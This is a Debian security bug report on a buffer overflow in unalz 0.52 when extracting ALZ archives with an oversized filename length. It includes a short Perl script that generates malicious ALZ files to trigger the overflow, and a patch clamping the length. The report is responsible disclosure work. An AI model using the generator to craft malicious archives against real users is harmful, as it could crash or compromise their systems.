Subject: unalz: buffer overflow when extracting archives Package: unalz Version: 0.52-1 Severity: grave Justification: user security hole Tags: security patch sarge etch sid
Hello, I have found a buffer overflow security vulnerability in unalz. It occurs when it extracts malicious ALZ archives. I have attached the archives oflow333.alz (for sarge) and oflow1621.alz (for testing and unstable), as well as the program alzgen.pl that generated them and a patch that corrects this issue. It is also possible to upgrade to the latest upstream version 0.53, which also corrects it. // Ulf Härnhammar, Debian Security Audit Project -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12-1-686 Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) Versions of packages unalz depends on: ii libc6 2.3.5-8 GNU C Library: Shared libraries an ii libgcc1 1:4.0.2-2 GCC support library ii libstdc++6 4.0.2-2 The GNU Standard C++ Library v3 unalz recommends no packages. -- no debconf information
oflow333.alz
Description: Binary data
oflow1621.alz
Description: Binary data
#!/usr/bin/perl -- # alzgen # by Ulf Harnhammar in 2005 # I hereby place this program in the public domain. die "usage: $0 <length> <filename>\n" unless @ARGV == 2; $len = shift; $lenhi = int($len / 256); $lenlo = $len - ($lenhi * 256); $file = shift; open(OUT, ">$file") or die "can't open file!\n"; print OUT "\x42\x4c\x5a\x01" . # SIG_LOCAL_FILE_HEADER chr($lenlo) . chr($lenhi) . # filename length "\x00" x 7 . 'U' x $len; close OUT or die "can't close file!?!?\n";
--- UnAlz.cpp.old 2004-11-25 07:23:36.000000000 +0100 +++ UnAlz.cpp 2005-11-20 01:04:23.000000000 +0100 @@ -359,6 +359,8 @@ return FALSE; } FRead(zipHeader.fileName, zipHeader.head.fileNameLength); + if(zipHeader.head.fileNameLength > MAX_PATH - 5) + zipHeader.head.fileNameLength = MAX_PATH - 5; zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;